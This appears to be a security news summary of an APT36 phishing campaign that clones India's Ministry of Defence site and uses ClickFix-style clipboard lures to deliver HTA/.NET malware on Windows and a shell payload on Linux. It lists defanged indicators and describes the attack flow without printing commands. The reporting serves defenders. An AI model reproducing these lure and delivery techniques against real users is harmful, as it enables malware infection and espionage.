Listen to this Post
In a chilling development that blurs the lines between digital impersonation and real-world consequences, cybersecurity researchers have uncovered a targeted phishing campaign exploiting the identity of Indiaâs Ministry of Defence. This sophisticated scheme seamlessly blends official-looking web portals, typosquatted domains, and cross-platform payloads to infect both Windows and Linux systems.
With cybercriminals becoming more precise and daring, this campaign showcases a disturbing evolution in social engineering tactics. Instead of brute force or mass phishing, the threat actors employ a psychological and technical finesse, mirroring government aesthetics and leveraging operating system-specific tricks to gain user trust and execute malicious code.
Key Highlights in :
A new phishing campaign uses cloned web infrastructure of India’s Ministry of Defence to deliver malware.
The attackers craft fake domains such as email.gov.in.drdosurvey[.]info, made to look like official government portals.
The malicious site mirrors a legitimate March 2025 press release page, fooling users with accurate design and branding.
Only one link is active, steering users into a âClickFixâ-style social engineering trap.
The site uses HTTrack software to duplicate the Ministryâs portal.
For Windows, users see a fake CAPTCHA with a blurred image of a legitimate Indian yoga site in the background.
A JavaScript script auto-copies a malicious command that users are told to paste into their terminal.
This command fetches a .hta file from trade4wealth[.]in, loading .NET-based malware.
A decoy PDF is shown to maintain the illusion of an official document.
Malware makes outbound connections to 185.117.90[.]212, linked to another spoofed domain.
The Linux version includes a misleading CAPTCHA labeled âIâm not a rebotâ.
Clicking it silently copies a shell command to the clipboard.
The script downloads a shell file (mapeal.sh) and opens a JPEG, with no further actionâfor now.
The malware delivery shows high attention to operational detail, evading many traditional detections.
Attackers use misspelled domains, spelling quirks, and deeply nested HTA payloads.
Domains are registered with Namecheap, commonly abused by threat actors.
Based on methods and infrastructure, researchers link this campaign to APT36 (Transparent Tribe).
APT36 is a Pakistan-aligned group historically targeting Indian military and government assets.
Their toolkit includes cloned websites, .NET malware loaders, and HTA scripts.
Cross-platform design indicates the attackersâ commitment to reach both Windows and Linux users.
The strategy mimics legitimate operational procedures and portals for better infiltration.
The phishing link was first detected in early March 2025 by Hunt.io.
Metadata analysis supports that timeframe for the compromise.
The attackers aim for persistence by presenting government-themed content during the infection.
Both payloads are clipboard-triggered, a subtle and rarely used vector.
Indicators of Compromise (IOCs) include IPs based in the US and Netherlands.
This evolving strategy demands vigilance from security teams on clipboard vectors and cloned pages.
The attack aligns with a growing trend of weaponizing authenticity to deceive.
It serves as a wake-up call for national cyber defense and policy enforcement bodies.
Real-time threat hunting and threat intelligence sharing are essential for future mitigation.
Government agencies must prioritize authentic domain monitoring to counter impersonation attacks.
What Undercode Say:
This campaign is more than just a phishing attackâitâs a showcase of modern cyber warfare tactics wrapped in the disguise of bureaucratic familiarity. By mimicking official portals, the threat actors are no longer hoping to trick just the uninformedâthey are aiming for those within government, military, and high-stakes sectors.
APT36âs involvement is highly plausible. Their known preferences for .NET-based loaders, HTA scripting, and deceptive lures tie directly into the tactics observed here. Their reliance on visual fidelityâright down to an operational CAPTCHA or a PDF decoyâdemonstrates a level of social engineering previously reserved for the most advanced actors.
The use of a ClickFix methodology, with OS-specific delivery paths, reveals a meticulous understanding of both platform architecture and user psychology. For Windows, the deployment uses mshta.exe, an often-overlooked but powerful tool capable of launching HTA scripts and bypassing traditional antivirus. For Linux, although the payload currently lacks persistence or deeper infection routines, its mere presence shows that the campaign is in active evolution.
The clipboard attack vector is particularly dangerous. Many security protocols focus on downloads, attachments, or link behaviorâbut this method copies the command directly, relying on human action to launch it. Itâs an intersection of social manipulation and system-level command execution.
More troubling is the attackersâ ability to exploit domain registration processes to acquire .in subdomains and name them convincingly close to real government properties. This points to a systemic weakness in how domain reputability and authenticity are currently managed, even in high-risk zones like government digital infrastructure.
Security practitioners must now treat even one-off, government-themed pages as potentially hostile, especially when combined with clipboard scripting or HTA deployment. Detection systems should be updated to recognize shallow clones and auto-copy scripts embedded in HTML. Meanwhile, national cyber agencies must reevaluate how their public-facing portals can be cloned and what authentication markers can be built to help users identify the real from the fake.
This case also reinforces the importance of metadata analysis in breach timelines. The discovery of HTTrack use and timestamps in the fake portalâs metadata allowed researchers to pinpoint when the breach likely occurred. Combining behavioral patterns with technical analysis helps form an early-warning system for future campaigns of this kind.
In essence, this attack is a preview of future hybrid threats, where malware delivery isn’t brute-force but surgically precise, backed by psychological realism, and capable of bypassing both human skepticism and digital defense layers.
Fact Checker Results:
The fake portal is a near-perfect replica of an Indian government site, built using HTTrack.
APT36’s signature techniques align closely with this campaign’s characteristics.
The malware relies on clipboard-based vectors, often overlooked in traditional threat models.
Prediction:
As this campaign matures, especially on Linux systems, we can expect more persistent malware variants to emerge. APT36 is likely testing the waters with cross-platform infection, preparing for larger-scale, synchronized attacks. Over time, more typosquatted domains and real-time cloning of government announcements may be used to increase authenticity. Security solutions must now adapt to clipboard monitoring and detect HTA or shell-based payloads before they executeâbecause in the next wave, users may not even know theyâre under attack until itâs too late.
References:
Reported By: cyberpress.org
Extra Source Hub:
https://www.facebook.com
Wikipedia
Undercode AI
Image Source:
Unsplash
Undercode AI DI v2
